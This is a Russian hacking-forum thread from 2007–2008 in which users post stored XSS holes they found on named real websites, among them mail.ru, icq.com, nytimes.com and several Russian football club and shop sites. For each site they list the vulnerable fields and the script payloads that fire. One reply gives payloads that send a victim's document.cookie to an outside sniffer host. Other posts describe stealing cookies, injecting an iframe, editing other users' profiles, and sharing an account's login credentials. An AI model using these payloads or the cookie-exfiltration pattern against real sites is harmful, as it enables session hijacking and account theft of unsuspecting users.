ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

BlackCats 07.12.2007 00:52

http://www.oops.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала OOPS
описание тут:
https://forum.antichat.ru/thread55136.html

BlackCats 07.12.2007 17:28

http://www.qr.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала Quattroruote
описание тут:
https://forum.antichat.ru/thread55136.html

DimOnOID 26.12.2007 10:07

Простенькая активка на My.mail.ru

Заходим в раздел *Желания* ->>Добавить желание...
Уязвимо поле *Метки* ...
Пример
Код:

http://my.mail.ru/my/wishlist?wish=313616
:) С Новым Годом) :)

P.S Активка уже не работает....10 часов прожила) .ПРЕВЕД АДМИНАМ МАЙЛА..И ЛИЧНО ЗАКЕРУ.....Знаю ещё одну..но больше не надейтесь, что я тут выложу)

freddi 31.12.2007 00:04

webfile.ru

загружаем картинку\пдф\тхт файлы со скриптом. скрипт выполняется при открытии файла.

~EviL~ 10.01.2008 02:49

Активная XSS на http://www.scandasia.com/

Уязвимость в комментариях к новостям в поле Your comment:

Например: http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009

freddi 14.01.2008 23:48

Цитата:

Сообщение от freddi
mail.ru yandex.ru rambler.ru

отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

на мейле прикрыли. куки норм приходят только на рамблер.


add

сейчас пробовал отправлять файлы типов: jpg xml txt pdf, все прекрасно везде работает %)

SSSetuPPP 15.01.2008 18:21

Цитата:

Сообщение от freddi
должно сработать и в опере(не хочу ставить чтобы проверять)

Я поставил и проверил - не работает. (в IE работает)

iddqd 18.01.2008 02:08

www.todj.ua - главный клубный портал Украины
В своем профиле, в разделе фото:
topdj.ua/clubbers/ваш_id/photo/
создаем новую галерею и в поле "название" вписываем js-код. Поле "клуб" вообще нигде не отображается, а "описание"- фильтруется.
Found by: /me

Dreel 19.01.2008 18:12

Вот моя активная xss:
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
Код:

Иванов Иван <script>alert(/ xss /)</script>

Заходим на сайт _http://www.virtualflowers.ru/abook.php
Регестрируемся [ регистрация там фуфло какое-то ;) ]
Добавить адресата - в каментах
Код:

<script>alert(/ Dreel /)</script>

http://www.slando.com.ua/images/slando.gif
Бесплатные объявления Киева

Заходим по адресу http://www.slando.com.ua и тыкаем кнопочку "подать объявление" продажа авто, уязвимо поле модель:
<script>alert(/ D /)</script>
Есть один недостаток - максимум 30 символов.

iddqd 20.01.2008 03:11

ero-club.ru
В своем профиле давим "добавить новое фото" -
создаем новый альбом и в поле"Название" пишем ядовитый код
Код HTML:

<script>alert(/iddqd/)</script>

xcedz 20.01.2008 03:28

http://www.knor.ru/cgi-bin/mag.pl?otziv гостевая полный набор и пасиф и актив

<script>alert(/отжиг/)</script>
зы то что, вчера написано было потерли... а баг видимо не хотят исправлять ну и ладно, я не в обиде, действительно, кому охота копаться в коде, тем более если он не твой :D )

Momiji 22.01.2008 04:17

http://news.nag.ru/news/root/crnews/
Уязвимы комментарии.
Код:

http://news.nag.ru/news/root/crnews/story15827/

SSSetuPPP 22.01.2008 12:40

Цитата:

Сообщение от Lamersha
народ поскажите что я могу зделать с этой xss тоько в IE пашет?? http://helpdesk.flygroup.st/index.php?="><script>alert(5555)</script>


пробовала это захожу по ссылке() на снифер не чего не приходит в чем может быть проблема?
http://helpdesk.flygroup.st/index.php?="><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>

заранее спасибо

PHP код:

http://s.netsec.ru/ 

регистрируй там сниффер
PHP код:

http://s.netsec.ru/Твой_Логин.gif 

адрес твоего сниффера

PHP код:

<a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a

вызов по ссылке

PHP код:

<img src="http://s.netsec.ru/Твой_Логин.gif"

код HTML

PHP код:

<script>img = new Image(); img.src "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script

вызов из скрипта

GreenBear
Сниффер от netsec.ru
http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html

•†•SyTiNeR•†• 29.01.2008 22:41

Цитата:

Сообщение от MaSter GeN
дико извеняюсь за офф топ достал куки каким образом их использовать если еcть инфа на анти чате дайте ссылочку пожалуйста
:)

Вбей в браузер вроде в Опере есть в настройках куда куки ставлять

it's my 30.01.2008 15:36

www.shinovozoff.ru - онлайн магазин авто-товаров

http://www.shinovozoff.ru/guestbook/
уязвимы все поля ввода, результат =)

o3,14um 03.02.2008 05:31

www.jino-net.ru

у себя в контрольной панели в поле подсказка пароля пишешь:
Код:

<script>alert(document.cookie)</script>
Затем идёшь восстанавливать пароль:
www.jino-net.ru/lostpass.phtml?login=ЛОГИН
и выскакивает алерт с куками

MaSter GeN 03.02.2008 21:43

Код:

gamer.kraslan.ru
в поле комментов втыкаем

Код:

<iframe src= http://you-money.100webspace.net <
рабочая версия

Код:

http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791

Momiji 06.02.2008 22:34

auto05.ru

Код:

http://www.auto05.ru/guestbook.html?page=1
Уязвимо поле комментариев.

redyarsk.ru
Код:

http://www.redyarsk.ru/gb/index.php?t=1&all=
Уязвимо поле комментариев.

MaSter GeN 18.02.2008 20:59

уууу блин
http://www.pressofatlanticcity.com

постим коммент к новости

Код:

<IMG """><SCRIPT>alert("master gen")</SCRIPT>">
получам
рабочий вариант !
http://www.pressofatlanticcity.com/188/story/84175.html

N1K70 22.02.2008 11:55

http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303

в заголовке (Subjekti) пишите:

<script>alert(/n1k70/)</script>

Haruka 25.02.2008 12:03

Вот
http://www.lugarus.com/users/haruka0000/
Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе".

it's my 29.02.2008 10:54

гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi
Пишем сообщение уязвимое поле: Heimasíða

imajo.ati 04.03.2008 16:54

icq.com

план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script>

затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке
http://icq.com/people/full_details_update.php

вылетит куча алертов =)
нужно "помочь" юзеру логиниться за ваш номер.

либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше

MadFun. 11.03.2008 06:30

Извеняюсь за повторение
www.omen.ru
<script>alert(\'Хss\')</script>
уязвимые поля
Ищу рост от:
Ищу рост до:
Ищу вес от:
Ищу вес до:

ЛифчиС5СВ 12.03.2008 19:03

www.26thavenue.com

Регимся на форуме:
Код:

http://www.26thavenue.com/index.php?action=main.forums
В профайле в поля Location, Interests пишем:
Код:

<script>alert("Antichat")</script>

Horsekiller 13.03.2008 13:52

Цитата:

Сообщение от ЛифчиС5СВ
www.26thavenue.com

Поковырял еще немного.

Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем
Код:

<script>alert(/Xss/)</script>
Потом еще при отправке сообщений - поля
Link URL,
Link Title.
Код:

"><script>alert()</script>
Забил в гугл
Цитата:

powered by bSpeak
попробовал в нескольких местах, везде работает.

Кроме этого есть пассивные XSS в этом движке, пример -
Код:

http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E
или в другом месте -
Код:

http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E

MaSter GeN 13.03.2008 18:23

www.nytimes.com
Ну собственно онлайн версия газеты нью йорк таймс :)
Нужно имять статут зарегенного пользователя
когда герегились постим коммент б блоге типа
Код:

<irame src=http://you.site.com/xss.html  <
ну и собстевенно создаем у себя страничку с названием xss.html
содержашую
Код:

<script>alert(/XSS/)<script>

xcedz 15.03.2008 03:25

lovas.ru
вообще бараги какие то, не люблю барыг
Заводим ак. Грузим фотку к ней добавляем коментарий с нашим кодом

напрмер таким </SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>
Возможно есть и sql inj

с помощью подзапросов к БД, вывел юзера 'lovas'@'localhost :)

ZET36 16.03.2008 11:06

bronepoezd.ru

в гостевой в поле сообщение пишем

[.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img]

без точек в бб теге

freddi 18.03.2008 22:12

file.mail.ru
narod.yandex.ru/disk/


заливаем файл со скриптом, который, при открытии файла, выполнится.

Tigger 19.03.2008 01:54

domex.ru

Уязвимые поля:
Площадь (м2)
Цена


В уязвимых полях пишем: "><script>alert()</script>

xcedz 21.03.2008 00:55

bloggerswap.com

Заводим акк на этом ресурсе

затем редактируем инфо Edit Account Details

в поле Website Name: добавим наш код:

">'><SCRIPT>alert(4)</SCRIPT> ;) жмем edit my account

xcedz 23.03.2008 18:00

Цитата:

Выкладывалась как то sql inj ====> equipnet.ru \выкладывал ее не без известный и всеми любимый Дон Карлеоне ;) привет Дон :rolleyes: \

http://www.equipnet.ru/job.php?beg_msg=0&end_msg=25

Добавим новое сообщение

<SCRIPT>alert(/Привет девчонки!/)</SCRIPT>
жертве нужно кликнуть по ссылке моего объявления и куку гриня ;)


+++++++++++++++++++++++++++++++++++

MaSter GeN 24.03.2008 12:52

ehbsr.com
не люблю я все таки американцев :)
Нужно иметь статус зерегнного пользователя вот:
User:birch64
password:ywrcws
тыкаем мой аккаунт и в поле fist name втыкаем:
Код:

<img"""><script>alert(/ЛЯ ПА ПАМ/)</script>

Tigger 26.03.2008 01:51

Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration
Уязвимые поля:
Фамилия
Имя
Отчество
NickName
Место Жительства

В уязвимых полях пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Луч-Энергия"
www.luch-energy.ru/?search
Уязвимое поле:
Ваш запрос

В уязвимом поле пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Локомотив"
http://www.fclm.ru/s-info-center/
Пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Амкар"
http://www.amkar.ru/reg/reg.asp
Уязвимые поля:
Логин
Город
Веб-Сайт

В уязвимых полях пишем: "><script>alert()</script>
Регестрируемся
Заходим
Вылетает Алерт

.Striker 30.03.2008 16:03

хостинг картинок
http://images.i-files.org/

в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт

-------------------------------

"Знаменитый" украинский хотинг файлов upload.com.ua

Заходим в аккаунт и создаем каталог с названием "><script>alert()</script>
Получаем активную xss ;)

PS upload уже профиксили :(

Buffalon 30.03.2008 23:30

http://ul-rocksite.info
Переходит на страницу чата:
http://ul-rocksite.info/index.php?page=chat
И в чате рисуем следующее:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
OPera Версия 9.23

AJAY 31.03.2008 14:42

Цитата:

хостинг картинок
http://images.i-files.org/

в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт
вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)

freddi 08.04.2008 23:06

mail.ru

http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)

freddi 09.04.2008 00:54

кстате и на forum.lady.mail.ru тоже работает)


Время: 06:54